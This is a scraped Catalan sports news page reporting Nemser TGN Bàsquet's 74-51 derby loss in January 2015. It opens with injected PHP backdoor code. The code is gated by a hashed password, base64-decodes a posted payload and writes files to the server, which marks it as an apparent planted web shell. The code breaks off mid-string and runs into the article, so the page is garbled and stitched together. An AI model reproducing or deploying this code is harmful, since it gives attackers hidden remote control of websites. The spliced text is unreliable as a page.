function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet perd el primer derbi tarragoní de la temporada (74-51) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet perd el primer derbi tarragoní de la temporada (74-51)

Updated: gener 11, 2015

El Nemser TGN Bàsquet no va poder vèncer el primer derbi tarragoní de la temporada després de perdre al pavelló del Serrallo per un contundent 74-51. El conjunt lila no va fer un bon inici de partit i això el va condemnar a anar a remolc del seu rival que, amb el marcador a favor, va jugar amb més confiança i no va deixar que les visitants poguessin situar-se per sota de la barrera psicològica dels 10 punts, un fet que va ser clau pel desenllaç del matx.

El partit va estar marcat per la superioritat local gràcies al bon partit de la jugadora del CBT Villegas, que va fer jugades de molt mèrit i va ser una de les claus per entendre la derrota del Nemser TGN Bàsquet. Villegas, però, no va estar sola i, ben acompanyada de Pascual, van ser una parella molt difícil de defensar per part de les visitants.

De bon començament, el partit va començar a decantar-se del bàndol del CBT arran del percentatge d’encert. El Nemser TGN Bàsquet aconseguia bones posicions de tir des de la mitja i llarga distància, però els llançaments no van entrar, alguns per autèntica mala sort -especialment Anais Muñoz-. El CBT va estar més fi i ben d’hora va gaudir de bons avantatges (20-9 al final del primer quart) i a partir d’aquell moment les coses es van complicar. En el segon quart, les distàncies es van fer molt grans i a tres minuts pel descans el marcador mostrava un preocupant 35-15. Aleshores el Nemser TGN Bàsquet es va situar en zona i, en atac, va trobar Ester Farré, que amb tres cistelles seguides va escurçar el desavantatge.

A la represa semblava que hi havia una esperança. Farré era qui dominava dins la zona i el CBT, tot i situar dues jugadores sobre ella al pal baix, no la podia aturar (45-32 a 6 minuts per acabar el període). Eren moments en què Laura Vilamajor es convertia en l’estilet ofensiu des del perímetre. Amb la millora visitant hi va haver nervis del bàndol local i l’entrenador del CBT va ser castigat amb una tècnica (49-37, minut 28). Malgrat tot, les ganes de voler capgirar el marcador van jugar una mala passada al Nemser TGN Bàsquet, que va perdre pilotes decisives. En atac estàtic les visitants tampoc trobaven Farré amb la facilitat que ho feien en l’inici del tercer quart i el CBT ho va aprofitar, amb una sèrie de jugades de dos més un, per tornar a distanciar-se (56-39).

L’últim període va ser un voler i no poder. La rauxa i la lluita no van ser suficients i, tot i l’empenta i la fe de les jugadores lila -5 punts seguits de Vilamajor i 58-45 a 7:54 del final- la distància no baixava dels 10 punts. Al final, esgotades, les visitants no van poder evitar que el CBT aconseguís la màxima diferència del partit en el resultat final.